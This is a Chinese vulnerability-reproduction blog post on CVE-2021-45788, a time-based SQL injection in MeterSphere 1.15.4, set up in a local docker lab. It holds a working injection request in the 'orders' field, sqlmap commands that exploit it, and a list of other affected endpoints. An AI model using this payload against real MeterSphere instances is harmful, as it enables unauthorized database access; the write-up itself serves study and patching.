【漏洞复现】CVE-2021-45788 SQL Injection

Mitch3112024-12-24 17:58

漏洞信息

NVD - cve-2021-45788

Time-based SQL Injection vulnerabilities were found in Metersphere v1.15.4 via the "orders" parameter.

Authenticated users can control the parameters in the "order by" statement, which causing SQL injection.

API: /test/case/list/{goPage}/{pageSize}

背景介绍

MeterSphere is an open-source, continuous testing platform widely used by developers and QA managers for test plan management, data-driven testing, and test reporting metrics. It is engineered to integrate seamlessly with a variety of development and CI/CD toolchains to enhance productivity in DevOps environments. The platform supports functional UI, performance, and API testing, aiming to optimize testing workflows. The primary users of MeterSphere are software development teams and testing specialists seeking to attain high-quality assurance in their product cycles. Its robust plug-in architecture allows it to be extended and customized for specific workflows and tool integrations, making it adaptable across different industry requirements.

主页:https://metersphere.io/

源码:https://github.com/metersphere/metersphere

环境搭建

docker-compose.yml

yaml 复制代码 
version: "2.1"
services:
  web:
    image: vulhub/metersphere:1.15.4
    ports:
      - "8081:8081"
      - "5005:5005"
    environment:
      MYSQL_SERVER: db:3306
      MYSQL_DB: metersphere
      MYSQL_USERNAME: root
      MYSQL_PASSWORD: root
      KAFKA_SERVER: kafka:9092
  db:
    image: mysql:5.7
    command: --sql-mode="STRICT_TRANS_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTITUTION" --max-connections=8000
    environment:
    - MYSQL_ROOT_PASSWORD=root
    - MYSQL_DATABASE=metersphere
  kafka:
    image: bitnami/kafka:3.4.1
    environment:
      # KRaft settings
      - KAFKA_CFG_NODE_ID=0
      - KAFKA_CFG_PROCESS_ROLES=controller,broker
      - KAFKA_CFG_CONTROLLER_QUORUM_VOTERS=0@kafka:9093
      # Listeners
      - KAFKA_CFG_LISTENERS=PLAINTEXT://:9092,CONTROLLER://:9093
      - KAFKA_CFG_ADVERTISED_LISTENERS=PLAINTEXT://:9092
      - KAFKA_CFG_LISTENER_SECURITY_PROTOCOL_MAP=CONTROLLER:PLAINTEXT,PLAINTEXT:PLAINTEXT
      - KAFKA_CFG_CONTROLLER_LISTENER_NAMES=CONTROLLER
      - KAFKA_CFG_INTER_BROKER_LISTENER_NAME=PLAINTEXT

Web UI:http://127.0.0.1:8081

账号admin、密码metersphere

漏洞复现

参考: [BUG]Time-based SQL Injetion in v1.15.4 · Issue #8651 · metersphere/metersphere

登录Web UI后进入http://127.0.0.1:8081/#/track/case/all创建新的测试用例:

POC:

http 复制代码 
POST /test/case/list/1/10 HTTP/1.1
Host: localhost.lan:8081
Content-Length: 3149
Accept: application/json, text/plain, */*
CSRF-TOKEN: fXx2lJHlPYUA1mmtPn69Bhxtx7UVXEz676ScrXnOlFyUcUPQ0hrM9pjbe4U23MDLdURgu8bAJTZdIdVUYsbaOg==
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7
Cookie: Hm_lvt_5819d05c0869771ff6e6a81cdec5b2e8=1733898529; skinName=skin-blue3; pageNo=1; pageSize=20; MS_SESSION_ID=2aad45b5-a17a-4a02-8e5d-0321805852d0
Connection: close
{"orders":[{"name":"name","type":",if(1=1,sleep(10),sleep(0))"}],"components":[{"key":"name","name":"MsTableSearchInput","label":"commons.name","operator":{"value":"like","options":[{"label":"commons.adv_search.operators.like","value":"like"},{"label":"commons.adv_search.operators.not_like","value":"not like"}]}},{"key":"tags","name":"MsTableSearchInput","label":"commons.tag","operator":{"value":"like","options":[{"label":"commons.adv_search.operators.like","value":"like"},{"label":"commons.adv_search.operators.not_like","value":"not like"}]}},{"key":"module","name":"MsTableSearchInput","label":"test_track.case.module","operator":{"value":"like","options":[{"label":"commons.adv_search.operators.like","value":"like"},{"label":"commons.adv_search.operators.not_like","value":"not like"}]}},{"key":"priority","name":"MsTableSearchSelect","label":"test_track.case.priority","operator":{"options":[{"label":"commons.adv_search.operators.in","value":"in"},{"label":"commons.adv_search.operators.not_in","value":"not in"}]},"options":[{"label":"P0","value":"P0"},{"label":"P1","value":"P1"},{"label":"P2","value":"P2"},{"label":"P3","value":"P3"}],"props":{"multiple":true}},{"key":"createTime","name":"MsTableSearchDateTimePicker","label":"commons.create_time","operator":{"options":[{"label":"commons.adv_search.operators.between","value":"between"},{"label":"commons.adv_search.operators.gt","value":"gt"},{"label":"commons.adv_search.operators.ge","value":"ge"},{"label":"commons.adv_search.operators.lt","value":"lt"},{"label":"commons.adv_search.operators.le","value":"le"},{"label":"commons.adv_search.operators.equals","value":"eq"}]}},{"key":"updateTime","name":"MsTableSearchDateTimePicker","label":"commons.update_time","operator":{"options":[{"label":"commons.adv_search.operators.between","value":"between"},{"label":"commons.adv_search.operators.gt","value":"gt"},{"label":"commons.adv_search.operators.ge","value":"ge"},{"label":"commons.adv_search.operators.lt","value":"lt"},{"label":"commons.adv_search.operators.le","value":"le"},{"label":"commons.adv_search.operators.equals","value":"eq"}]}},{"key":"creator","name":"MsTableSearchSelect","label":"api_test.creator","operator":{"options":[{"label":"commons.adv_search.operators.in","value":"in"},{"label":"commons.adv_search.operators.not_in","value":"not in"},{"label":"commons.adv_search.operators.current_user","value":"current user"}]},"options":{"url":"/user/list","labelKey":"name","valueKey":"id"},"props":{"multiple":true}},{"key":"reviewStatus","name":"MsTableSearchSelect","label":"test_track.review_view.execute_result","operator":{"options":[{"label":"commons.adv_search.operators.in","value":"in"},{"label":"commons.adv_search.operators.not_in","value":"not in"}]},"options":[{"label":"test_track.review.prepare","value":"Prepare"},{"label":"test_track.review.pass","value":"Pass"},{"label":"test_track.review.un_pass","value":"UnPass"}],"props":{"multiple":true}}],"filters":{"reviewStatus":["Prepare","Pass","UnPass"]},"planId":"","nodeIds":[],"selectAll":false,"unSelectIds":[],"selectThisWeedData":false,"selectThisWeedRelevanceData":false,"caseCoverage":null}

if分支执行:

else分支执行:

基于此可以验证存在时间盲注,通过sqlmap或者自己写爆破脚本实现漏洞利用:

sh 复制代码 
python sqlmap.py -r req.txt --dbms mysql --technique T --prefix , --level 3
python sqlmap.py -r req.txt --dbms mysql --technique T --prefix , --level 3 --current-user

此外,这个漏洞还存在于很多其他接口:

basic 复制代码 
/test/plan/case/list/all
/test/plan/case/list/ids
/issues/list/{goPage}/{pageSize}
/test/case/list/{goPage}/{pageSize}

漏洞分析

漏洞source位于backend/src/main/java/io/metersphere/track/service/TestPlanTestCaseService.java:

漏洞sink位于backend/src/main/java/io/metersphere/base/mapper/ext/ExtTestPlanTestCaseMapper.xml:

相关推荐
伊成18 分钟前
Docker 部署 Nginx 完整指南
nginx·docker·容器
落日漫游1 小时前
K8s核心组件全解析
运维·docker·运维开发
Mr. zhihao2 小时前
SQL LEFT JOIN 与 WHERE 条件的隐藏坑
数据库·sql
silver98863 小时前
sql链接的url中serverTimezone的作用
数据库·sql
江湖有缘5 小时前
【Docker项目实战】使用Docker部署Notepad轻量级记事本
docker·容器·notepad++
云游5 小时前
大模型性能指标的监控系统(prometheus3.5.0)和可视化工具(grafana12.1.0)基础篇
grafana·prometheus·可视化·监控
sleetdream5 小时前
Flink Sql 按分钟或日期统计数据量
sql·flink
BTU_YC6 小时前
docker compose部署mysql
mysql·adb·docker
2301_780789667 小时前
边缘节点 DDoS 防护:CDN 节点的流量清洗与就近拦截方案
安全·web安全·ddos
Python私教8 小时前
Docker in Test:用一次性的真实环境,终结“测试永远跑不通”魔咒
运维·docker·容器
热门推荐
01UV安装并设置国内源02KGG转MP3工具|非KGM文件|解密音频03【2025.08.06最新版】Android Studio下载、安装及配置记录(自动下载sdk)04Qwen3-Coder 快速上手教程 | Qwen Code + Claude Code052025最新国内服务器可用docker源仓库地址大全(2025年8月更新)06蜘蛛磁力 搜索引擎大全,如何使用蜘蛛磁力查找磁力链接07TRAE Rules 实践:为项目配置 6A 工作流08全球最强模型Grok4,国内已可免费使用!(附教程)09TRAE 规则(Rules)配置指南:个人习惯、团队规范与最佳实践10NVIDIA显卡驱动、CUDA、cuDNN 和 TensorRT 版本匹配指南